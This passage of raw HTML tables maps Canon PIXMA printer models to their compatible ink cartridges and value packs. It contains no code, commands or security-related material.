(Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"11\" align=\"center\">PIXMA iX6870</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Black)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751XL (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-750 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-750XL (Pigment Black)</td>\n</tr>\n<tr>\n<td>PGI-755XXL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>CL-746XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745XL (Pigment Black)</td>\n</tr>\n</tbody>\n</table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3570</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3670</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA MG7570</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP160</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP170</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP180</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP228</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP237</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP245</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP258</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP276</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td 